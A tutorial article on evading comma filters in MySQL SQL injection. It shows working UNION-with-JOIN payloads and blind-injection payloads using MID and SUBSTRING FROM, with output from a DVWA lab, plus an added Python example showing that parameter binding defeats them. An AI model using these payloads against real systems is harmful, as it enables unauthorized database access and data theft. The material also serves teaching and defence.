
Example Analysis of Bypassing Comma Filtering in SQL Injection

2025-01-18 Update From: SLTechnology News&Howtos shulou

Shulou (Shulou.com) 05/31

This article walks through examples of bypassing comma filtering in SQL injection, for both in-band (UNION-based) injection and blind injection. Most readers are probably not very familiar with these techniques, so the examples are shared here for reference.

1. Bypassing commas in UNION query (in-band) injection

In a UNION query, we use the form UNION SELECT 1,2,3,4,5,6,7..n to reveal the display positions (the columns that are echoed back in the page), and that statement contains several commas. If the WAF intercepts commas, this UNION query cannot be used.

Bypass

At a display position, substitute commonly used injection variables or other statements:

union select * from ((select 1) A join (select 2) B join (select group_concat(user(),' ',database(),' ',@@datadir)) C)

Demonstrating the UNION query in the database

The part starting at UNION is the statement we would inject into the URL. This is only a demonstration; in practice, if the injected statement contains a comma, it may be intercepted.

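mysql> select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
| 1       | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1       | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)

Without commas, using JOIN to inject

mysql> select user_id,user,password from users union select * from ((select 1) A join (select 2) B join (select 3) C);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
| 1       | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1       | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)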

Query the data we want

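mysql> select user_id,user,password from users union select * from ((select 1) A join (select 2) B join (select group_concat(user(),' ',database(),' ',@@datadir)) C);
+---------+-------+-------------------------------------------------+
| user_id | user  | password                                        |
+---------+-------+-------------------------------------------------+
| 1       | admin | 5f4dcc3b5aa765d61d8327deb882cf99                |
| 1       | 2     | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)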
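From the defender's side, the JOIN form above shows why filtering commas is not a fix, while binding the input as a parameter is. The following is an added example, not code from the original article: it uses Python's sqlite3 as a stand-in for MySQL, and the table contents, function names and request values are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the article's `users` table (SQLite, not MySQL).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'constructed-hash')")
    return db

def comma_filter_allows(value):
    # The weak control under discussion: reject any input containing a comma.
    return "," not in value

def lookup_concatenated(db, user_id):
    # Vulnerable pattern: request input is spliced into the SQL text.
    sql = "SELECT user_id, user, password FROM users WHERE user_id = " + user_id
    return db.execute(sql).fetchall()

def lookup_bound(db, user_id):
    # Hardened pattern: input is bound as a value and never parsed as SQL.
    sql = "SELECT user_id, user, password FROM users WHERE user_id = ?"
    return db.execute(sql, (user_id,)).fetchall()

# Constructed request values: the article's comma form and its JOIN form.
COMMA_FORM = "1 UNION SELECT 1,2,3"
JOIN_FORM = "1 UNION SELECT * FROM ((SELECT 1) A JOIN (SELECT 2) B JOIN (SELECT 3) C)"

def report():
    # For each form: does the comma filter let it through, and how many rows
    # does each query style return for it?
    db = make_db()
    out = {}
    for name, value in (("comma", COMMA_FORM), ("join", JOIN_FORM)):
        allowed = comma_filter_allows(value)
        out[name] = {
            "passes_comma_filter": allowed,
            "rows_concatenated": len(lookup_concatenated(db, value)) if allowed else 0,
            "rows_bound": len(lookup_bound(db, value)),
        }
    return out

if __name__ == "__main__":
    for name, result in report().items():
        print(name, result)
```

The comma filter stops only the first form; the bound query returns no rows for either, because the whole value is compared against user_id as data.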

2. Bypassing commas in blind injection

The MID and SUBSTR functions are used to extract characters from text fields.

mysql> select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro              |
+-----------------+
1 row in set (0.04 sec)

Query the ascii code of the first character of the database user name

mysql> select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
| 1       | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 114     | 2     | 3                                |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)

Blind injection, by guessing the ASCII value

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115);
Empty set

mysql> select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
| 1       | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)

Bypassing commas with the SUBSTRING function

SUBSTRING(str FROM pos)

Returns the substring of the string str starting at position pos.

mysql> select substring('hello' from 1);
+---------------------------+
| substring('hello' from 1) |
+---------------------------+
| hello                     |
+---------------------------+
1 row in set (0.04 sec)

mysql> select substring('hello' from 2);
+---------------------------+
| substring('hello' from 2) |
+---------------------------+
| ello                      |
+---------------------------+
1 row in set (0.03 sec)

Inject

mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114);
Empty set

// The ASCII code of substring(user() from 2) is 111

mysql> select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111);
+---------+-------+----------------------------------+
| user_id | user  | password                         |
+---------+-------+----------------------------------+
| 1       | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)

That concludes this article on bypassing comma filtering in in-band and blind SQL injection. Thank you for reading!
